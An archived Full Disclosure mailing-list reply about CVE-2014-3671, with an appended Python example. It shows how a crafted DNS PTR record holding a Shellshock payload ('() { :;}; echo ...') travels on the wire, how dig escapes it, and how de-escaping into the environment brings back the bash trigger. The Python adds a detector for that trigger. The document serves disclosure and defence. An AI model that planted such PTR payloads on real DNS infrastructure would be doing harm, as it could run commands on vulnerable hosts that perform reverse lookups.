Open Source and information security mailing list archives
Date: Tue, 14 Oct 2014 15:45:34 +0100
From: Dirk-Willem van Gulik <dirkx@...weaving.org>
To: Florian Weimer <fw@...eb.enyo.de>
Cc: fulldisclosure@...lists.org
Subject: Re: [FD] CVE-2014-3671: DNS Reverse Lookup as a vector for the Bash vulnerability (CVE-2014-6271 et.al.)


On 14 Oct 2014, at 13:04, Florian Weimer <fw@...eb.enyo.de> wrote:

>> A simple zone file; such as:
>> 
>>     $TTL 10;
>>     $ORIGIN in-addr.arpa.
>>     @     IN SOA     ns.boem.wleiden.net dirkx.webweaving.org (
>>                    666        ; serial
>>                    360 180 3600 1800 ; very short lifespan.
>>                    )
>>     IN          NS     127.0.0.1
>>     *           PTR      "() { :;}; echo CVE-2014-6271, CVE-201407169, RDNS" 
> 
> I'm surprised DNS servers grok this, should be
> 
> * IN PTR \(\)\032\{\032:\;\}\;\032echo\032CVE-2014-6271\,\032CVE-201407169\,\032RDNS.
> 
> Or something similar.

The production versions of NSD accept this fine ‘as is’ (FreeBSD-9.3); bind requires a bit of careful escaping.

On the wire one then sees the raw ‘binary’ — which can indeed be very raw:

000001d0  XX XX XX XX 31 28 29 20  7b 20 3a 3b 7d 3b 20 65        () { :;}; e|
000001e0  63 68 6f 20 63 76 65 2d  32 30 31 34 2d 36 32 37  |cho cve-2014-627|
000001f0  31 2c 20 63 76 65 2d 32  30 31 34 30 37 31 36 39  |1, cve-201407169|
00000200  2c 20 72 64 6e 73 c0 14  c0 XX XX XX XX XX XX XX  |, rdns

And once you push this through DIG - one sees:

	4.3.2.1.in-addr.arpa.	10	IN	PTR	\(\)\032{\032:\;}\;\032echo\032cve-2014-6271,\032cve-201407169,\032rdns.in-addr.arpa.

depending on your escaping (which normal unix libc/resolver does). And then we found at least one setenv() which would *de-escape* the above nicely, getting the octal and decimal right.

Dw.


_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
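The chain described in the message above (raw payload in the PTR rdata on the wire, dig's backslash/\DDD presentation escaping, and a consumer that de-escapes it back into the bytes bash would see) as an added example; this is not code from the post or from NSD, bind or dig. It encodes the payload as an uncompressed DNS wire name (note the 0x31 = 49 length octet, which is the "31" visible at the start of the hex dump), renders it with the escaping rules that BIND's ns_name_ntop applies (backslash before `"`, `(`, `)`, `.`, `;`, `\`, `@`, `$`, and `\DDD` decimal for anything non-printable, including space), reverses that escaping, and flags the Shellshock function-definition prefix. The sample payload string and dig line are copied from the message; the trailing `.in-addr.arpa.` in dig's output is the zone `$ORIGIN` appended because the PTR target in the zone file has no trailing dot.

```python
"""Added example (not part of the original post): PTR payload on the wire,
dig-style presentation escaping, de-escaping, and a Shellshock check."""

# Constructed from the message above: the label carried in the PTR rdata.
PAYLOAD = b"() { :;}; echo cve-2014-6271, cve-201407169, rdns"
# The dig output quoted in the message (owner/TTL/class/type stripped).
DIG_OUTPUT = r"\(\)\032{\032:\;}\;\032echo\032cve-2014-6271,\032cve-201407169,\032rdns.in-addr.arpa."

# Characters BIND's ns_name_ntop protects with a backslash in presentation form.
_SPECIAL = b'"().;\\@$'


def to_wire_name(labels):
    """Encode byte labels as an uncompressed wire-format name (RFC 1035 3.1):
    one length octet per label, terminated by the zero-length root label."""
    out = bytearray()
    for raw in labels:
        if not 0 < len(raw) < 64:
            raise ValueError("label length must be 1..63 octets")
        out.append(len(raw))
        out += raw
    out.append(0)
    return bytes(out)


def from_wire_name(buf, offset=0):
    """Decode an uncompressed wire name; returns (labels, offset past it).
    Compression pointers (top two bits set) are out of scope here."""
    labels = []
    while True:
        n = buf[offset]
        offset += 1
        if n == 0:
            return labels, offset
        if n & 0xC0:
            raise ValueError("compression pointer not handled in this example")
        labels.append(bytes(buf[offset:offset + n]))
        offset += n


def escape_label(raw):
    """Presentation form of one label as dig prints it: specials get a
    backslash, other printable ASCII passes through, the rest becomes \\DDD."""
    out = []
    for b in raw:
        if b in _SPECIAL:
            out.append("\\" + chr(b))
        elif 0x21 <= b <= 0x7E:
            out.append(chr(b))
        else:
            out.append("\\%03d" % b)  # decimal, e.g. space -> \032
    return "".join(out)


def unescape_label(text):
    """Reverse escape_label: \\DDD (three decimal digits) and \\c forms.
    This is the kind of de-escaping the message says a setenv() path did."""
    out, i = bytearray(), 0
    while i < len(text):
        if text[i] != "\\":
            out.append(ord(text[i]))
            i += 1
            continue
        if i + 1 >= len(text):
            raise ValueError("dangling backslash")
        digits = text[i + 1:i + 4]
        if len(digits) == 3 and digits.isdigit():
            out.append(int(digits))
            i += 4
        else:
            out.append(ord(text[i + 1]))
            i += 2
    return bytes(out)


def split_presentation_name(name):
    """Split a presentation-form name on unescaped dots, keeping escapes intact."""
    labels, cur, i = [], [], 0
    while i < len(name):
        c = name[i]
        if c == "\\":
            width = 4 if name[i + 1:i + 4].isdigit() else 2
            cur.append(name[i:i + width])
            i += width
        elif c == ".":
            labels.append("".join(cur))
            cur = []
            i += 1
        else:
            cur.append(c)
            i += 1
    if cur:
        labels.append("".join(cur))
    return labels


def looks_like_shellshock(raw):
    """CVE-2014-6271 trigger: an environment value starting with '() {'."""
    return raw.lstrip().startswith(b"() {")


def ptr_target_is_shellshock(presentation_name):
    """Take a PTR target as dig prints it, de-escape its first label, and
    report whether handing it to bash via the environment would be unsafe."""
    first = split_presentation_name(presentation_name)[0]
    return looks_like_shellshock(unescape_label(first))


if __name__ == "__main__":
    wire = to_wire_name([PAYLOAD, b"in-addr", b"arpa"])
    print(wire[:16].hex(" "))               # starts with 31 28 29 20 7b ...
    print(escape_label(from_wire_name(wire)[0][0]))
    print("shellshock:", ptr_target_is_shellshock(DIG_OUTPUT))
```

The point for a resolver consumer is the last function: the escaped form that dig shows is harmless as a string, but any layer that "helpfully" decodes `\032` and `\(` back into bytes before exporting the PTR name into the environment reproduces the original `() { :;};` prefix that bash parses as a function definition.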
